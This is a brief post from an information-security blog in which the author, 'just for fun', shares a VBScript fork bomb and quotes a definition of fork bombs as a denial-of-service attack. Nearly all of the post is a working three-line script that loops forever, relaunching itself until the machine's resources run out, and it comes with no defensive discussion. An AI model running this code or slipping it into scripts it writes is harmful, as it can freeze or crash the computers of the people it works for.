J Wolfgang Goerlich's thoughts on Information Security
VBScript Fork Bomb

By wolfgang. 26 September 2008 16:37

I have been playing around with VBScript. I thought I would make a quick fork bomb, just for fun. "The fork bomb, a form of denial-of-service attack against a computer system, implements the fork operation (or equivalent functionality) whereby a running process can create another running process." (Wikipedia)

Do until true = false
 CreateObject("Wscript.Shell").Run Wscript.ScriptName
Loop

Tags:

Security

    Log in